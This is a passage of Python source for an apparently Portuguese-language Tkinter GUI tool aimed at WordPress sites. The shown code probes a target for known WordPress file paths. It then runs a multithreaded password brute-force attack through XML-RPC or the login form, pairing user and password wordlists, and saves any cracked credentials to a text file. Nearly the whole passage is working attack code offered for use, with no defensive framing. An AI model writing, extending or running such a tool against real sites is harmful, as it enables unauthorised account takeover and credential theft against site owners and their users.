                    f.write(f"{u}:{pw}\n")
            self.log(f"[✓] Senhas salvas em: {p}", "orange")
            messagebox.showinfo("Sucesso", f"Credenciais salvas em:\n{p}")
        except Exception as e:
            messagebox.showerror("Erro", f"Não foi possível salvar: {e}")

    # ---------- Scan de arquivos ----------
    def scan_files(self):
        base = self.url.get().strip().rstrip("/")
        self.log(f"\n[*] Varredura de arquivos em: {base} ({len(WORDPRESS_PATHS)} caminhos)\n")

        def run():
            resultados = []
            for p in WORDPRESS_PATHS:
                url = f"{base}/{p}"
                try:
                    r = requests.get(url, headers=UA, timeout=10, verify=False)
                    if r.status_code == 200:
                        self.log(f"[200] {url}")
                        resultados.append((url, r.status_code))
                except Exception:
                    pass
            with self.lock:
                self.scan_results = resultados
            self.log(f"\n[*] Varredura concluída. {len(resultados)} arquivos encontrados (200).\n")
            self.log("[*] Use o botão '3) Salvar scan em .txt' para exportar.")

        threading.Thread(target=run, daemon=True).start()

    # ---------- Brute force ----------
    def worker(self, q, base, method, total_users):
        while not self.stop_event.is_set() and not q.empty():
            try:
                user, pwd = q.get_nowait()
            except queue.Empty:
                break
            try:
                with self.lock:
                    if user in self.found_users:
                        continue
                self.log(f"[*] Testando usuario = {user:<15} senha = {pwd}", "cyan")
                if method == "xmlrpc":
                    ok = bf_xmlrpc(base, user, pwd)
                    if ok:
                        with self.lock:
                            self.found.append((user, pwd))
                            self.found_users.add(user)
                            restantes = total_users - len(self.found_users)
                        self.log(f"!!! SUCESSO (XMLRPC): usuario = {user:<15} senha = {pwd}", "orange")
                        if restantes <= 0:
                            self.log("✅ TODOS os usuários quebrados! Parando...", "orange")
                            self.stop_event.set()
                            break
                else:
                    ok = bf_login(base, user, pwd, self.found, self.log)
                    if ok:
                        with self.lock:
                            self.found_users.add(user)
                            restantes = total_users - len(self.found_users)
                        if restantes <= 0:
                            self.log("✅ TODOS os usuários quebrados! Parando", "red")
                            self.stop_event.set()
                            break
                if not ok and not self.stop_event.is_set():
                    self.log(f"[-] Falha: {user}:{pwd}")
            except Exception as e:
                self.log(f"[!] Erro {user}: {e}", "red")
            finally:
                q.task_done()

    def brute(self):
        base = self.url.get().strip().rstrip("/")
        wl_path = self.wl.get().strip()
        users = [u.strip() for u in self.users.get("1.0", "end").splitlines() if u.strip()]
        if not users:
            messagebox.showerror("Erro", "Informe ou carregue uma wordlist de usuários primeiro.")
            return
        users = list(dict.fromkeys(users))
        try:
            with open(wl_path, "r", encoding="utf-8", errors="ignore") as f:
                words = [w.strip() for w in f if w.strip()]
        except Exception:
            messagebox.showerror("Erro", "Wordlist inválida ou não encontrada.")
            return
        if not words:
            messagebox.showerror("Erro", "A wordlist de senhas está vazia.")
            return
        try:
            n = int(self.threads_v.get())
        except ValueError:
            n = 5

        q = queue.Queue()
        for u, p in itertools.product(users, words):
            q.put((u, p))

        self.found.clear()
        self.found_users.clear()
        self.stop_event.clear()

        self.log(f"\n🔥 Brute force iniciado: {len(users)} usuários x {len(words)} senhas = {q.qsize()} tentativas ({n} threads)\n")
        self.log(f"[*] Alvo: {base} — usuários: {', '.join(users)}\n\n", "cyan")

        for _ in range(n):
            threading.Thread(target=self.worker, args=(q, base, self.method.get(), len(users)), daemon=True).start()

        def monitor():
            q.join()
            if not self.stop_event.is_set():
                if self.found:
                    self.log("[*] Fila finalizada. Usuários quebrados:", "orange")
                    for u, p in self.found:
                        self.log(f"    ✅ {u} : {p}", "orange")
                    nao = [u for u in users if u not in self.found_users]
                    if nao:
                        self.log(f"[-] Sem senha encontrada para: {', '.join(nao)}", "red")
                else:
                    self.log("[-] Nenhuma credencial encontrada.", "red")
            self.log("[*] Brute force finalizado. Use o botão 'Salvar senhas em .txt' para exportar.")

        threading.Thread(target=monitor, daemon=True).start()

if __name__ == "__main__":
    root = tk.Tk()
    App(root)
    root.mainloop()
